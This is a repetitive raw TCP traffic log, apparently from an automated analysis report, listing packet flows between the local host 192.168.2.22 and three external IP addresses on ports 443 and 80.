              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49161 -> 153.121.40.91:443
              Source: global trafficTCP traffic: 153.121.40.91:443 -> 192.168.2.22:49161
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 154.23.184.218:80
              Source: global trafficTCP traffic: 154.23.184.218:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 154.23.184.218:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 154.23.184.218:80
              Source: global trafficTCP traffic: 154.23.184.218:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 154.23.184.218:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 154.23.184.218:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 154.23.184.218:80
              Source: global trafficTCP traffic: 192.168.2.22:49162 -> 154.23.184.218:80
              Source: global trafficTCP traffic: 154.23.184.218:80 -> 192.168.2.22:49162
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 45.33.6.223:80 -> 192.168.2.22:49163
              Source: global trafficTCP traffic: 192.168.2.22:49163 -> 45.33.6.223:80
